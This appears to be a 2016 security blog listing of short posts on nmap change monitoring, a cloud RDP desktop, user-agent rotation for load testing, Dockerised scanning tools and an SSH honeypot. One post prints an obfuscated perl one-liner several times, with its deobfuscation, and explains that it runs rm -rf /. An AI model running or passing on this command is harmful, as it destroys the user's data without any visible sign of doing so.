Career, Hacking

I am often asked  “What is the easiest thing companies can do to secure their networks?” and my answer is always always “Know what is on your network.”   While that is simple advice it is a lot harder to implement.   One company I was working with was looking at a system to do continuous network monitoring (read: scheduled nmap scans) for $40,000 a year.

After I cried for the state of my industry I told them I could do this for them with a small shell script, a $5 a month Digital Ocean Droplet and a free Sendgrid account.

Here is how I did it:

  • Created a free Sendgrid account.
  • Spun up $5 a Month Digitalocean Ubuntu Droplet.
  • Added a nmaper.company.com DNS record to be perfectly clear waht the box was doing.
  • Updated and installed needed software:
    sudo apt-get update && sudo apt-get dist-upgrade
    sudo apt-get install ssmtp nmap xsltproc
  • Created necessary folders:
    mkdir /root/nmap/
    mkdir /root/nmap/diffs
  • Edit /etc/ssmtp/ssmtp.conf with this:
    root=jgamblin@sendgrid.com
    mailhub=smtp.sendgrid.com
    rewriteDomain=
    hostname=jgamblin@sendgrid.com
    UseSTARTTLS=YES
    AuthUser=jgamblin
    AuthPass=password
    FromLineOverride=YES
  • Copy this to /root/namp/scan.sh:
    #!/bin/sh
    TARGETS="jerrygamblin.com scanme.nmap.org"
    OPTIONS="-v -sV -T4 -F --open"
    date=$(date +%F%T)
    cd ~/nmap/diffs
    nmap $OPTIONS $TARGETS -oA scan-$date > /dev/null
    email()
    {
    /usr/sbin/ssmtp jerry.gamblin@gmail.com <<EOF
    From: nmap@jerrygamblin.com
    Subject: nmap ndiff$(date +"%Y-%m-%d")*** NDIFF RESULTS ***

    $(cat diff-$date)
    EOF
    }
    if [ -e scan-prev.xml ]; then
    ndiff scan-prev.xml scan-$date.xml > diff-$date
    [ "$?" -eq "1" ] && email
    fi
    ln -sf scan-$date.xml scan-prev.xml

  • Test (add cat diff-$date to bottom of the script to see output.)
  • Add a cron job to crontab to run every 15 minutes (or hour for bigger networks)
  • Talk your boss into buying you something awesome with the $39,970 in savings.

It was as simple as that and I put this together in an afternoon.  Up next is to build a Slackbot and an  to deliver the differences to their slack channel.

 

Career, Hacking

I use DigitalOcean for a majority of my testing and from time to time I need a desktop environment to run some of my tools (like burp). After spending much more time than I want to admit I have it  down to these 10 commands to bring a Ubuntu + Mate + XRDP desktop to a Ubuntu Droplet :

sudo apt-get update && sudo apt-get dist-upgrade -y
sudo apt-get install --no-install-recommends ubuntu-mate-core ubuntu-mate-desktop -y
sudo apt-get install mate-core mate-desktop-environment mate-notification-daemon xrdp -y
adduser burp
usermod -aG admin burp
usermod -aG sudo burp
su - burp
echo mate-session> ~/.xsession
sudo cp /home/burp/.xsession /etc/skel
sudo service xrdp restart

From there you can use any RDP viewer to connect to your droplet: Screen Shot 2016-10-19 at 9.15.22 PM

 

Career, Hacking

Earlier this week someone sent me this one line perl script (that you shouldn’t run):
perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;; y; -/:-@[-`{-};`-{/" -;;s;;$_;see'

Due to some really clever code obfuscation  it runs rm -rf /.

You  can deobfuscate (is that word?) with this:
perl -e 's;;=]=>%-{<-|}<&|`{;; y; -/:-@[-`{-};`-{/" -;;print "$_\n"'

While trying to figure out how this code code I stumbled upon the fact that OSX does not require  --no-preserve-root which has been required since version 6.4 of GNU Core Utilities which was released in 2006.

Here is what happens if you run perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;; y; -/:-@[-`{-};`-{/" -;;s;;$_;see'  on Ubuntu 16:10:

Screen Shot 2016-10-16 at 7.54.36 PMHere is what happens if you run perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;; y; -/:-@[-`{-};`-{/" -;;s;;$_;see'  on MacOS 10.12:

2016-10-16 19.59.13

This seems like a pretty big oversight by the Apple Team and I have filled a bug report but haven’t heard anything yet.

Career, Hacking

Recently I have been working with some NGFW tools to automatically detect and block when someone is scraping, brute forcing or “load testing” your website.   I quickly ran into a problem where none of the tools I use would allow me to quickly change user agents so I put together a couple of quick scripts that call one of 7500 valid user agents from this file.

First I went with the old standby of CURL which does the job but I was only able to do 10 requests in 4 seconds.

Here is what the output of curl.sh looks like:

That was not going to be fast enough for my testing needs so I switch to Apache Bench and am able to do 1,000 requests in 2 seconds. Which was what I need to do proper testing.

Here is what the output of ab.sh looks like:

All the scripts are in this GitHub Repo.
As always:  Use these for good, not bad.

Uncategorized

I use nmap all the time at work and recently came across rainmap-lite which is an amazing web interface for nmap that allows you to easily schedule and email scan results.  I wanted to be able to share it with a class I am teaching so I did what I  have been doing lately and put it into a docker container:

Screen Shot 2016-08-30 at 8.21.19 PM

Running it is as simple as:
docker run -ti -p 8080:8080 --name rainmap jgamblin/rainmap
Then access:
http://yourip:8080/console 

You can now run a ton of nmap scans and get the results emailed to you and your team:  Screen Shot 2016-08-30 at 7.47.54 PM Screen Shot 2016-08-30 at 7.53.10 PM

Here is the DockerFile:
FROM ubuntu:latest
RUN apt-get update && apt-get install sqlite3 git nmap python-pip  -y
RUN pip install --upgrade pip
RUN pip install lxml
RUN pip install Django
RUN git clone https://github.com/cldrn/rainmap-lite
WORKDIR /rainmap-lite/rainmap-lite/
ADD  run.sh /rainmap-lite/rainmap-lite/run.sh
RUN chmod 777 /rainmap-lite/rainmap-lite/run.sh
CMD ./run.sh

Here is the run.sh:
#!/bin/bash
sed -i "s/8000/8080/g" "nmaper-cronjob.py"
echo What is your public IP address?
read ip
sed -i "s/127.0.0.1/$ip/g" "nmaper-cronjob.py"
echo What is your SMTP user name?
read user
sed -i "s/youremail@gmail.com/$user/g" "nmaper-cronjob.py"
echo What is your SMTP password?
read pass
sed -i "s/yourpassword/$pass/g" "nmaper-cronjob.py"
echo What is your SMTP address?
read smtp
sed -i "s/smtp.gmail.com/$smtp/g" "nmaper-cronjob.py"
python manage.py migrate
python manage.py loaddata nmapprofiles
python manage.py createsuperuser
python manage.py runserver 0.0.0.0:8080 &
while true
do
python nmaper-cronjob.py
sleep 15
done

Protip:  SendGrid offers a free SMTP server. 

Career, Hacking, Security

One of the first things I like to do when I start looking at a PCAP during an investigation is run it through snort to see if it finds anything suspicious. You can easily do this at the command line with  snort -dv -r test.pcap but the output is not great.

I have been using a tool called websnort for better output recently and decided it was time to put it into a docker container for easy portability.

Screen Shot 2016-08-25 at 7.48.51 AM

To run it: 
docker run -d -p 8080:8080 jgamblin/websnort

If you want to build your own the  dockerfile is:
FROM ubuntu:latest
ENV DEBIAN_FRONTEND noninteractive
RUN apt-get update && apt-get install python-pip snort -y
RUN chmod a+r /etc/snort/snort.conf
RUN pip install websnort
CMD websnort

Protip:
 malware-traffic-analysis.net has great PCAPs for testing your security tools.

Hacking, Security

My friends at DigitalOcean were nice enough to give me a generous amount of credit on their cloud platform to do some security research with so I decided to do the most reckless thing I could think of and run a full ssh honeypot on the internet.

The build out is pretty simple, it is the  SSHoneypot Docker Container I wrote on a debian droplet with all outbound traffic blocked so that in theory not much damage can be done. 

Surprisingly, It has taken a few days for people to start exploiting the boxes but when I got up this morning 2 of the boxes had been “hacked”:Screen Shot 2016-08-17 at 7.01.29 AM

In order to share these findings with the community I will copy all files written to these honeypots to honeyfiles.jgamblin.com.

Screen Shot 2016-08-17 at 6.58.05 AM

I have a long way to go with this project as way too much of it is manual now.  I need to invest the time to automate notification, moving the files to the web server and starting a new container.

If you are interested in full pcaps or any of the actual exploited SSHoneypot containers reach out to me on twitter at @jgamblin I will be glad to share.